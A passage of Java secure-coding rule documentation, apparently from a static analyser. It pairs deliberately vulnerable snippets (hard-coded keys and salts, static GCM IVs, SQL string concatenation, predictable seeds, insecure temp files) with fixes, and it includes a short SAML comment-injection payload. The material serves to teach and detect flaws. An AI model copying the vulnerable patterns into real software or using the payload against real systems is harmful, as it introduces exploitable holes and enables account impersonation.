It does not matter if the impersonation is malicious: In either case, it is a clear breach of trust in the system, as the systems involved falsely assume that the authenticated entity is who it claims to be.
The consequences can be catastrophic.

Keeping credentials in plain text in a code base is tantamount to sharing that password with anyone who has access to the source code and runtime servers.
Thus, it is a breach of trust, as these individuals have the ability to impersonate others.

Secret management services are the most efficient tools to store credentials and protect the identities associated with them.
Cloud providers and on-premise services can be used for this purpose.

If storing credentials in a secret data management service is not possible, follow these guidelines:

  • Do not store credentials in a file that an excessive number of people can access.
    • For example, not in code, not in a spreadsheet, not on a sticky note, and not on a shared drive.
  • Use the production operating system to protect password access control.
    • For example, in a file whose permissions are restricted and protected with chmod and chown.

Noncompliant code example

import org.h2.security.SHA256;

String inputString = "s3cr37";
byte[] key         = inputString.getBytes();

SHA256.getHMAC(key, message);  // Noncompliant

Compliant solution

Using AWS Secrets Manager:

import software.amazon.awssdk.services.secretsmanager.SecretsManagerClient;
import software.amazon.awssdk.services.secretsmanager.model.GetSecretValueRequest;
import software.amazon.awssdk.services.secretsmanager.model.GetSecretValueResponse;
import org.h2.security.SHA256;

public static void doSomething(SecretsManagerClient secretsClient, String secretName) {
  GetSecretValueRequest valueRequest = GetSecretValueRequest.builder()
    .secretId(secretName)
    .build();

  GetSecretValueResponse valueResponse = secretsClient.getSecretValue(valueRequest);
  String secret                        = valueResponse.secretString();

  byte[] key = secret.getBytes();
  SHA256.getHMAC(key, message);
}

Using Azure Key Vault Secret:

import com.azure.identity.DefaultAzureCredentialBuilder;
import com.azure.security.keyvault.secrets.SecretClient;
import com.azure.security.keyvault.secrets.SecretClientBuilder;
import com.azure.security.keyvault.secrets.models.KeyVaultSecret;
import org.h2.security.SHA256;

public static void doSomething(SecretClient secretClient, String secretName) {
  KeyVaultSecret retrievedSecret = secretClient.getSecret(secretName);
  String secret = retrievedSecret.getValue();

  byte[] key = secret.getBytes();
  SHA256.getHMAC(key, message);
}

Resources

java:S5344

Why is this an issue?

A user password should never be stored in clear-text. Instead, a hash should be produced from it using a secure algorithm that is:

  • not vulnerable to brute force attacks.
  • not vulnerable to collision attacks (see rule s4790).
  • combined with a salt added to the password to lower the risk of rainbow table attacks (see rule s2053).

This rule raises an issue when a password is stored in clear-text or with a hash algorithm vulnerable to brute force attacks. Algorithms like MD5 or the SHA family compute hashes quickly, so brute force attacks (exhausting the entire space of all possible passwords) remain feasible, especially with hardware like GPUs, FPGAs, or ASICs. Modern password hashing algorithms such as bcrypt, PBKDF2, or argon2 are recommended.
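For instance, PBKDF2 is available in the JDK without any extra dependency. A minimal sketch (the iteration count is an assumption; tune it to your hardware):

```java
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;

public class PasswordHasher {
    private static final int ITERATIONS = 210_000; // deliberately slow, to hinder brute force
    private static final int KEY_BITS = 256;

    // A fresh random salt per password lowers the risk of rainbow table attacks.
    public static byte[] newSalt() {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt);
        return salt;
    }

    public static byte[] hash(char[] password, byte[] salt) throws GeneralSecurityException {
        PBEKeySpec spec = new PBEKeySpec(password, salt, ITERATIONS, KEY_BITS);
        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                               .generateSecret(spec).getEncoded();
    }
}
```

The salt and hash would both be stored; verification re-hashes the submitted password with the stored salt and compares the results.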

Noncompliant code example

@Autowired
public void configureGlobal(AuthenticationManagerBuilder auth, DataSource dataSource) throws Exception {
  auth.jdbcAuthentication()
    .dataSource(dataSource)
    .usersByUsernameQuery("SELECT * FROM users WHERE username = ?")
    .passwordEncoder(new StandardPasswordEncoder()); // Noncompliant

  // OR
  auth.jdbcAuthentication()
    .dataSource(dataSource)
    .usersByUsernameQuery("SELECT * FROM users WHERE username = ?"); // Noncompliant; default uses plain-text

  // OR
  auth.userDetailsService(...); // Noncompliant; default uses plain-text
  // OR
  auth.userDetailsService(...).passwordEncoder(new StandardPasswordEncoder()); // Noncompliant
}

Compliant solution

@Autowired
public void configureGlobal(AuthenticationManagerBuilder auth, DataSource dataSource) throws Exception {
  auth.jdbcAuthentication()
    .dataSource(dataSource)
    .usersByUsernameQuery("Select * from users where username=?")
    .passwordEncoder(new BCryptPasswordEncoder());

  // or
  auth.userDetailsService(null).passwordEncoder(new BCryptPasswordEncoder());
}

Resources

java:S6432

Why is this an issue?

When encrypting data with a Counter (CTR) derived block cipher mode of operation, it is essential not to reuse the same initialization vector (IV) with a given key; such an IV is called a "nonce" (number used only once). Galois/Counter Mode (GCM) and Counter with Cipher Block Chaining-Message Authentication Code (CCM) are both CTR-based modes of operation.

An attacker who knows one plaintext (original content) and ciphertext (encrypted content) pair is able to retrieve the corresponding plaintext of any other ciphertext generated with the same IV and key. It also drastically decreases the key recovery computational complexity by downgrading it to a simpler polynomial root-finding problem.

When using GCM, NIST recommends a 96-bit nonce using a 'Deterministic' construction, or at least 96 bits using a 'Random Bit Generator (RBG)'. The 'Deterministic' construction involves a counter that increments with each encryption. The 'RBG' construction, as the name suggests, generates the nonce using a random bit generator. Because of collision probabilities (nonce-key pair reuse), the 'RBG-based' approach requires a shorter key rotation period: at most 2^32 invocations per key.
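The 'RBG' construction can be sketched as follows: each call draws a fresh 96-bit nonce, so encrypting the same plaintext twice under the same key yields different ciphertexts (a minimal JDK sketch; the nonce-prefixed output layout is an assumption of this example):

```java
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;

public class GcmEncryptor {
    private static final SecureRandom RNG = new SecureRandom();

    // Returns nonce || ciphertext; a fresh 96-bit nonce is drawn per call.
    public static byte[] encrypt(byte[] key, byte[] plaintext) throws GeneralSecurityException {
        byte[] nonce = new byte[12]; // 96-bit nonce, RBG construction
        RNG.nextBytes(nonce);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "AES"),
                    new GCMParameterSpec(128, nonce));
        byte[] ct = cipher.doFinal(plaintext);
        byte[] out = new byte[12 + ct.length];
        System.arraycopy(nonce, 0, out, 0, 12);
        System.arraycopy(ct, 0, out, 12, ct.length);
        return out;
    }
}
```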

Noncompliant code example

public void encrypt(byte[] key, byte[] ptxt) {
    byte[] bytesIV = "7cVgr5cbdCZV".getBytes("UTF-8"); // The initialization vector is a static value

    GCMParameterSpec gcmSpec    = new GCMParameterSpec(128, bytesIV); // The initialization vector is configured here
    SecretKeySpec keySpec       = new SecretKeySpec(key, "AES");

    Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
    cipher.init(Cipher.ENCRYPT_MODE, keySpec, gcmSpec);  // Noncompliant
}

Compliant solution

public void encrypt(byte[] key, byte[] ptxt) {
    SecureRandom random = new SecureRandom();
    byte[] bytesIV = new byte[12];
    random.nextBytes(bytesIV); // Random 96-bit IV

    GCMParameterSpec gcmSpec    = new GCMParameterSpec(128, bytesIV);
    SecretKeySpec keySpec       = new SecretKeySpec(key, "AES");

    Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
    cipher.init(Cipher.ENCRYPT_MODE, keySpec, gcmSpec);
}

Resources

java:S2077

Formatted SQL queries can be difficult to maintain and debug, and can increase the risk of SQL injection when untrusted values are concatenated into the query. However, this rule doesn’t detect SQL injections (unlike rule S3649); its goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sensitive Code Example

public User getUser(Connection con, String user) throws SQLException {

  Statement stmt1 = null;
  Statement stmt2 = null;
  PreparedStatement pstmt;
  try {
    stmt1 = con.createStatement();
    ResultSet rs1 = stmt1.executeQuery("GETDATE()"); // No issue; hardcoded query

    stmt2 = con.createStatement();
    ResultSet rs2 = stmt2.executeQuery("select FNAME, LNAME, SSN " +
                 "from USERS where UNAME=" + user);  // Sensitive

    pstmt = con.prepareStatement("select FNAME, LNAME, SSN " +
                 "from USERS where UNAME=" + user);  // Sensitive
    ResultSet rs3 = pstmt.executeQuery();

    //...
}

public User getUserHibernate(org.hibernate.Session session, String data) {

  org.hibernate.Query query = session.createQuery(
            "FROM students where fname = " + data);  // Sensitive
  // ...
}

Compliant Solution

public User getUser(Connection con, String user) throws SQLException {

  Statement stmt1 = null;
  PreparedStatement pstmt = null;
  String query = "select FNAME, LNAME, SSN " +
                 "from USERS where UNAME=?"
  try {
    stmt1 = con.createStatement();
    ResultSet rs1 = stmt1.executeQuery("GETDATE()");

    pstmt = con.prepareStatement(query);
    pstmt.setString(1, user);  // Good; PreparedStatements escape their inputs.
    ResultSet rs2 = pstmt.executeQuery();

    //...
  }
}

public User getUserHibernate(org.hibernate.Session session, String data) {

  org.hibernate.Query query =  session.createQuery("FROM students where fname = ?");
  query = query.setParameter(0,data);  // Good; Parameter binding escapes all input

  org.hibernate.Query query2 =  session.createQuery("FROM students where fname = " + data); // Sensitive
  // ...
}

See

java:S4347

Why is this an issue?

The java.security.SecureRandom class provides a strong random number generator (RNG) appropriate for cryptography. However, seeding it with a constant or another predictable value will weaken it significantly. In general, it is much safer to rely on the seed provided by the SecureRandom implementation.

This rule raises an issue when SecureRandom.setSeed() or SecureRandom(byte[]) are called with a seed that is either one of:

  • a constant
  • the system time

Noncompliant code example

SecureRandom sr = new SecureRandom();
sr.setSeed(123456L); // Noncompliant
int v = sr.nextInt();

sr = new SecureRandom("abcdefghijklmnop".getBytes("us-ascii")); // Noncompliant
v = sr.nextInt();

Compliant solution

SecureRandom sr = new SecureRandom();
int v = sr.nextInt();

Resources

java:S5679

Why is this an issue?

In 2018, Duo Security found a new vulnerability class that affects SAML-based single sign-on (SSO) systems and this led to the following vulnerabilities being disclosed: CVE-2017-11427, CVE-2017-11428, CVE-2017-11429, CVE-2017-11430, CVE-2018-0489, CVE-2018-7340.

From a specially crafted <SAMLResponse> file, an attacker who already has access to the SAML system with their own account can bypass the authentication mechanism and be authenticated as another user.

This is due to the fact that the SAML protocol relies on the XML format, and to how the underlying XML parser interprets XML comments.

If an attacker manages to insert XML comments into the <NameID> field identifying the authenticated user, they can exploit the vulnerability.

Here is an example of a potential payload:

<SAMLResponse>
  [...]
  <Subject>
    <NameID>admin@domain.com<!---->.evil.com</NameID>
  </Subject>
  [...]
</SAMLResponse>

The attacker can generate a valid <SAMLResponse> for their own account "admin@domain.com.evil.com", then modify it with XML comments so that they are finally authenticated as "admin@domain.com". To prevent this vulnerability in applications using Spring Security SAML relying on OpenSAML2, XML comments should be ignored by setting the property ignoreComments to true.
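The underlying parser behavior can be reproduced with the JDK's DOM API: the comment splits the element content into two text nodes, so an implementation that reads only the first text node sees a truncated NameID (the helper class below is illustrative, not part of any SAML library):

```java
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import java.io.StringReader;

public class NameIdDemo {
    // Naive extraction: reads only the first text node, which the
    // comment has cut short.
    public static String firstTextNode(String xml) throws Exception {
        return parse(xml).getFirstChild().getNodeValue();
    }

    // Full extraction: concatenates all text content, skipping comments.
    public static String fullText(String xml) throws Exception {
        return parse(xml).getTextContent();
    }

    private static Element parse(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
        return (Element) doc.getElementsByTagName("NameID").item(0);
    }
}
```

The two read strategies disagree on the payload above, which is exactly the discrepancy the attack exploits.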

Noncompliant code example

import org.opensaml.xml.parse.BasicParserPool;
import org.opensaml.xml.parse.ParserPool;
import org.opensaml.xml.parse.StaticBasicParserPool;

public ParserPool parserPool() {
  StaticBasicParserPool staticBasicParserPool = new StaticBasicParserPool();
  staticBasicParserPool.setIgnoreComments(false); // Noncompliant: comments are not ignored during parsing, opening the door to the vulnerability
  return staticBasicParserPool;
}
public ParserPool parserPool() {
  BasicParserPool basicParserPool = new BasicParserPool();
  basicParserPool.setIgnoreComments(false); // Noncompliant
  return basicParserPool;
}

Compliant solution

public ParserPool parserPool() {
  return new StaticBasicParserPool(); // Compliant: "ignoreComments" is set to "true" in StaticBasicParserPool constructor
}
public ParserPool parserPool() {
  return new BasicParserPool();  // Compliant: "ignoreComments" is set to "true" in BasicParserPool constructor
}

Resources

java:S5689

Disclosing technology fingerprints allows an attacker to gather information about the technologies used to develop the web application and to perform relevant security assessments more quickly (like the identification of known vulnerable components).

Ask Yourself Whether

  • The x-powered-by HTTP header or similar is used by the application.
  • Technologies used by the application are confidential and should not be easily guessed.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

It’s recommended not to disclose the technologies used on a website, for example via the x-powered-by HTTP header.

In addition, it’s better to completely disable this HTTP header rather than setting it to a random value.

Sensitive Code Example

public ResponseEntity<String> testResponseEntity() {
  HttpHeaders responseHeaders = new HttpHeaders();
  responseHeaders.set("x-powered-by", "myproduct"); // Sensitive

  return new ResponseEntity<String>("foo", responseHeaders, HttpStatus.CREATED);
}

Compliant Solution

Don’t use x-powered-by or Server HTTP header or any other means disclosing fingerprints of the application.

See

java:S5322

Android applications can receive broadcasts from the system or other applications. Receiving intents is security-sensitive. For example, it has led in the past to the following vulnerabilities:

Receivers can be declared in the manifest or in the code to make them context-specific. If the receiver is declared in the manifest, Android will start the application, if it is not already running, once a matching broadcast is received. The receiver is then an entry point into the application.

Other applications can send potentially malicious broadcasts, so it is important to consider broadcasts as untrusted and to limit the applications that can send broadcasts to the receiver.

Permissions can be specified to restrict broadcasts to authorized applications. Restrictions can be enforced by both the sender and receiver of a broadcast. If permissions are specified when registering a broadcast receiver, then only broadcasters who were granted this permission can send a message to the receiver.

This rule raises an issue when a receiver is registered without specifying any broadcast permission.

Ask Yourself Whether

  • The data extracted from intents is not sanitized.
  • Intents broadcast is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See the Android documentation for more information.

Sensitive Code Example

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.IntentFilter;
import android.os.Build;
import android.os.Handler;
import android.support.annotation.RequiresApi;

public class MyIntentReceiver {

    @RequiresApi(api = Build.VERSION_CODES.O)
    public void register(Context context, BroadcastReceiver receiver,
                         IntentFilter filter,
                         String broadcastPermission,
                         Handler scheduler,
                         int flags) {
        context.registerReceiver(receiver, filter); // Sensitive
        context.registerReceiver(receiver, filter, flags); // Sensitive

        // Broadcasting intent with "null" for broadcastPermission
        context.registerReceiver(receiver, filter, null, scheduler); // Sensitive
        context.registerReceiver(receiver, filter, null, scheduler, flags); // Sensitive
    }
}

Compliant Solution

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.IntentFilter;
import android.os.Build;
import android.os.Handler;
import android.support.annotation.RequiresApi;

public class MyIntentReceiver {

    @RequiresApi(api = Build.VERSION_CODES.O)
    public void register(Context context, BroadcastReceiver receiver,
                         IntentFilter filter,
                         String broadcastPermission,
                         Handler scheduler,
                         int flags) {

        context.registerReceiver(receiver, filter, broadcastPermission, scheduler);
        context.registerReceiver(receiver, filter, broadcastPermission, scheduler, flags);
    }
}

See

java:S5443

Operating systems have global directories to which any user has write access. These folders are mostly used as temporary storage areas, like /tmp on Linux-based systems. An application manipulating files in these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted, or deleted. The risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see the list below). It also detects access to environment variables that point to publicly writable directories, e.g., TMP and TMPDIR.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a dedicated sub-folder with tightly controlled permissions
  • Use secure-by-design APIs to create temporary files. Such APIs make sure that:
    • The generated filename is unpredictable
    • The file is readable and writable only by the creating user ID
    • The file descriptor is not inherited by child processes
    • The file will be destroyed as soon as it is closed

Sensitive Code Example

new File("/tmp/myfile.txt"); // Sensitive
Paths.get("/tmp/myfile.txt"); // Sensitive

java.io.File.createTempFile("prefix", "suffix"); // Sensitive, will be in the default temporary-file directory.
java.nio.file.Files.createTempDirectory("prefix"); // Sensitive, will be in the default temporary-file directory.
Map<String, String> env = System.getenv();
env.get("TMP"); // Sensitive

Compliant Solution

new File("/myDirectory/myfile.txt");  // Compliant

File.createTempFile("prefix", "suffix", new File("/mySecureDirectory"));  // Compliant

if(SystemUtils.IS_OS_UNIX) {
  FileAttribute<Set<PosixFilePermission>> attr = PosixFilePermissions.asFileAttribute(PosixFilePermissions.fromString("rwx------"));
  Files.createTempFile("prefix", "suffix", attr); // Compliant
}
else {
  File f = Files.createTempFile("prefix", "suffix").toFile();  // Compliant
  f.setReadable(true, true);
  f.setWritable(true, true);
  f.setExecutable(true, true);
}

See

java:S5445

Temporary files are considered insecurely created when the file existence check is performed separately from the actual file creation. Such a situation can occur when creating temporary files using normal file handling functions or when using dedicated temporary file handling functions that are not atomic.

Why is this an issue?

Creating temporary files in a non-atomic way introduces race condition issues in the application’s behavior. Indeed, a third party can create a given file between when the application chooses its name and when it creates it.

In such a situation, the application might use a temporary file that it does not entirely control. In particular, this file’s permissions might be different than expected. This can lead to trust boundary issues.

What is the potential impact?

Attackers with control over a temporary file used by a vulnerable application will be able to modify it in a way that will affect the application’s logic. By changing this file’s Access Control List or other operating system-level properties, they could prevent the file from being deleted or emptied. They may also alter the file’s content before or while the application uses it.

Depending on why and how the affected temporary files are used, the exploitation of a race condition in an application can have various consequences. They can range from sensitive information disclosure to more serious application or hosting infrastructure compromise.

Information disclosure

Because attackers can control the permissions set on temporary files and prevent their removal, they can read what the application stores in them. This might be especially critical if this information is sensitive.

For example, an application might use temporary files to store users' session-related information. In such a case, attackers controlling those files can access session-stored information. This might allow them to take over authenticated users' identities and entitlements.

Attack surface extension

An application might use temporary files to store technical data for further reuse or as a communication channel between multiple components. In that case, it might consider those files part of the trust boundaries and use their content without additional security validation or sanitation. In such a case, an attacker controlling the file content might use it as an attack vector for further compromise.

For example, an application might store serialized data in temporary files for later use. In such a case, attackers controlling those files' content can change it in a way that will lead to an insecure deserialization exploitation. It might allow them to execute arbitrary code on the application hosting server and take it over.

How to fix it

Code examples

The following code example is vulnerable to a race condition attack because it creates a temporary file using an unsafe API function.

Noncompliant code example

import java.io.File;
import java.io.IOException;

protected void Example() throws IOException {
    File tempDir;
    tempDir = File.createTempFile("tmp", null);
    tempDir.delete();
    tempDir.mkdir();  // Noncompliant
}

Compliant solution

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

protected void Example() throws IOException {
    Path tempPath = Files.createTempDirectory("");
    File tempDir = tempPath.toFile();
}

How does this work?

Applications should create temporary files so that no third party can read or modify their content. It requires that the files' name, location, and permissions are carefully chosen and set. This can be achieved in multiple ways depending on the applications' technology stacks.

Use a secure API function

Temporary file handling APIs generally provide secure functions to create temporary files. In most cases, they operate atomically, creating and opening a file with a unique and unpredictable name in a single call. Those functions can often replace less secure alternatives without significant development effort.

Here, the example compliant code uses the safer Files.createTempDirectory function to manage the creation of temporary directories.

Strong security controls

Temporary files can be created using unsafe functions and APIs as long as strong security controls are applied. Non-temporary file-handling functions and APIs can also be used for that purpose.

In general, applications should ensure that attackers cannot create a file before them. This translates into the following requirements when creating the files:

  • Files should be created in a non-public directory.
  • File names should be unique.
  • File names should be unpredictable. They should be generated using a cryptographically secure random generator.
  • File creation should fail if a target file already exists.

Moreover, when possible, it is recommended that applications destroy temporary files after they have finished using them.
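The requirements above can also be met manually when a dedicated secure API is unavailable. The sketch below is illustrative (the directory and naming scheme are assumptions, not a prescribed implementation): it uses a cryptographically secure random name and relies on Files.createFile failing when the target already exists.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.SecureRandom;

public class SecureTempFile {
    private static final SecureRandom RANDOM = new SecureRandom();

    // Creates a file with an unpredictable name inside a non-public directory.
    // Files.createFile fails if the target already exists, so an attacker
    // cannot pre-create the file.
    static Path create(Path privateDir) throws IOException {
        byte[] bytes = new byte[16];
        RANDOM.nextBytes(bytes); // cryptographically secure random name
        StringBuilder name = new StringBuilder("tmp-");
        for (byte b : bytes) name.append(String.format("%02x", b));
        return Files.createFile(privateDir.resolve(name.toString()));
    }

    public static void main(String[] args) throws IOException {
        Path dir = Files.createTempDirectory("app-private-");
        Path file = create(dir);
        try {
            Files.writeString(file, "session data");
        } finally {
            Files.deleteIfExists(file); // destroy the temporary file once done
        }
    }
}
```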

Resources

Documentation

  • OWASP - Insecure Temporary File

Standards

  • OWASP - Top 10 2021 - A01:2021 - Broken Access Control
  • OWASP - Top 10 2017 - A9:2017 - Using Components with Known Vulnerabilities
  • MITRE - CWE-377: Insecure Temporary File
  • MITRE - CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
java:S5324

Storing data locally is a common task for mobile applications. Such data includes files among other things. One convenient way to store files is to use the external file storage, which usually offers a larger amount of disk space compared to internal storage.

Files created on the external storage are globally readable and writable. Therefore, a malicious application having the permissions WRITE_EXTERNAL_STORAGE or READ_EXTERNAL_STORAGE could try to read sensitive information from the files that other applications have stored on the external storage.

External storage can also be removed by the user (e.g. when based on an SD card), making the files unavailable to the application.

Ask Yourself Whether

Your application uses external storage to:

  • store files that contain sensitive data.
  • store files that are not meant to be shared with other applications.
  • store files that are critical for the application to work.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use internal storage whenever possible as the system prevents other apps from accessing this location.
  • Only use external storage if you need to share non-sensitive files with other applications.
  • If your application has to use the external storage to store sensitive data, make sure it encrypts the files using EncryptedFile.
  • Data coming from external storage should always be considered untrusted and should be validated.
  • As some external storage can be removed, make sure to never store files on it that are critical for the usability of your application.

Sensitive Code Example

import android.content.Context;

public class AccessExternalFiles {

    public void accessFiles(Context context) {
        context.getExternalFilesDir(null); // Sensitive
    }
}

Compliant Solution

import android.content.Context;

public class AccessExternalFiles {

    public void accessFiles(Context context) {
        context.getFilesDir();
    }
}

See

java:S6418

Because it is easy to extract strings from an application source code or binary, secrets should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Secrets should be stored outside of the source code in a configuration file or a management service for secrets.

This rule detects variables/fields having a name matching a list of words (secret, token, credential, auth, api[_.-]?key) being assigned a pseudorandom hard-coded value. The pseudorandomness of the hard-coded value is based on its entropy and the probability of being human-readable. The randomness sensitivity can be adjusted if needed. Lower values will detect less random values, potentially raising more false positives.
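The entropy heuristic mentioned above can be illustrated with Shannon entropy over the characters of a candidate string. This is only a sketch of the idea, not SonarQube's actual detection logic; the class and method names are illustrative.

```java
import java.util.HashMap;
import java.util.Map;

public class EntropyCheck {
    // Shannon entropy of the string, in bits per character.
    static double shannonEntropy(String s) {
        Map<Character, Integer> counts = new HashMap<>();
        for (char c : s.toCharArray()) counts.merge(c, 1, Integer::sum);
        double entropy = 0.0;
        for (int count : counts.values()) {
            double p = (double) count / s.length();
            entropy -= p * (Math.log(p) / Math.log(2)); // -sum(p * log2(p))
        }
        return entropy;
    }

    public static void main(String[] args) {
        // A random-looking hex token scores noticeably higher than a plain word.
        System.out.println(shannonEntropy("47828a8dd77ee1eb9dde2d5e93cb221ce8c32b37"));
        System.out.println(shannonEntropy("password"));
    }
}
```

Lowering the detection threshold on such a metric flags more strings as "random enough" to be secrets, which is why lower sensitivity values can raise more false positives.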

Ask Yourself Whether

  • The secret allows access to a sensitive component like a database, a file storage, an API, or a service.
  • The secret is used in a production environment.
  • Application re-distribution is required before updating the secret.

There would be a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the secret in a configuration file that is not pushed to the code repository.
  • Use your cloud provider’s service for managing secrets.
  • If a secret has been disclosed through the source code: revoke it and create a new one.

Sensitive Code Example

private static final String MY_SECRET = "47828a8dd77ee1eb9dde2d5e93cb221ce8c32b37";

public static void main(String[] args) {
  MyClass.callMyService(MY_SECRET);
}

Compliant Solution

Using AWS Secrets Manager:

import software.amazon.awssdk.services.secretsmanager.SecretsManagerClient;
import software.amazon.awssdk.services.secretsmanager.model.GetSecretValueRequest;
import software.amazon.awssdk.services.secretsmanager.model.GetSecretValueResponse;

public static void main(String[] args) {
  SecretsManagerClient secretsClient = ...
  MyClass.doSomething(secretsClient, "MY_SERVICE_SECRET");
}

public static void doSomething(SecretsManagerClient secretsClient, String secretName) {
  GetSecretValueRequest valueRequest = GetSecretValueRequest.builder()
    .secretId(secretName)
    .build();

  GetSecretValueResponse valueResponse = secretsClient.getSecretValue(valueRequest);
  String secret = valueResponse.secretString();
  // do something with the secret
  MyClass.callMyService(secret);
}

Using Azure Key Vault Secret:

import com.azure.identity.DefaultAzureCredentialBuilder;

import com.azure.security.keyvault.secrets.SecretClient;
import com.azure.security.keyvault.secrets.SecretClientBuilder;
import com.azure.security.keyvault.secrets.models.KeyVaultSecret;

public static void main(String[] args) throws InterruptedException, IllegalArgumentException {
  String keyVaultName = System.getenv("KEY_VAULT_NAME");
  String keyVaultUri = "https://" + keyVaultName + ".vault.azure.net";

  SecretClient secretClient = new SecretClientBuilder()
    .vaultUrl(keyVaultUri)
    .credential(new DefaultAzureCredentialBuilder().build())
    .buildClient();

  MyClass.doSomething(secretClient, "MY_SERVICE_SECRET");
}

public static void doSomething(SecretClient secretClient, String secretName) {
  KeyVaultSecret retrievedSecret = secretClient.getSecret(secretName);
  String secret = retrievedSecret.getValue();

  // do something with the secret
  MyClass.callMyService(secret);
}

See

java:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' passwords and salts couple might be low depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using longer, cryptographically secure salt should be preferred.
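The collision probability described above follows the birthday bound. The sketch below uses the standard approximation p ≈ 1 − exp(−n(n−1)/2·2^bits); the user counts and salt sizes are chosen purely for illustration.

```java
public class SaltCollision {
    // Approximate probability that at least two of n random salts collide,
    // for a salt of `bits` bits (birthday-bound approximation).
    static double collisionProbability(long n, int bits) {
        double space = Math.pow(2, bits);
        return 1.0 - Math.exp(-((double) n * (n - 1)) / (2.0 * space));
    }

    public static void main(String[] args) {
        // One million users with a 32-bit salt: a collision is near certain.
        System.out.println(collisionProbability(1_000_000, 32));
        // With a 128-bit salt, the collision probability is negligible.
        System.out.println(collisionProbability(1_000_000, 128));
    }
}
```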

How to fix it in Java SE

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

import javax.crypto.spec.PBEParameterSpec;

public void hash() {
    byte[] salt = "salty".getBytes();
    PBEParameterSpec cipherSpec = new PBEParameterSpec(salt, 10000); // Noncompliant
}

Compliant solution

import java.security.SecureRandom;
import javax.crypto.spec.PBEParameterSpec;

public void hash() {
    SecureRandom random = new SecureRandom();
    byte[] salt = new byte[16];
    random.nextBytes(salt);

    PBEParameterSpec cipherSpec = new PBEParameterSpec(salt, 10000);
}

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

Here, the compliant code example ensures the salt is random and has a sufficient length by calling the nextBytes method from the SecureRandom class with a salt buffer of 16 bytes. This class implements a cryptographically secure pseudo-random number generator.

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
java:S5320

In Android applications, broadcasting intents is security-sensitive. For example, it has led in the past to the following vulnerability:

By default, broadcasted intents are visible to every application, exposing all sensitive information they contain.

This rule raises an issue when an intent is broadcasted without specifying any "receiver permission".

Ask Yourself Whether

  • The intent contains sensitive information.
  • Intent reception is not restricted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Restrict the access to broadcasted intents. See Android documentation for more information.

Sensitive Code Example

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.os.UserHandle;
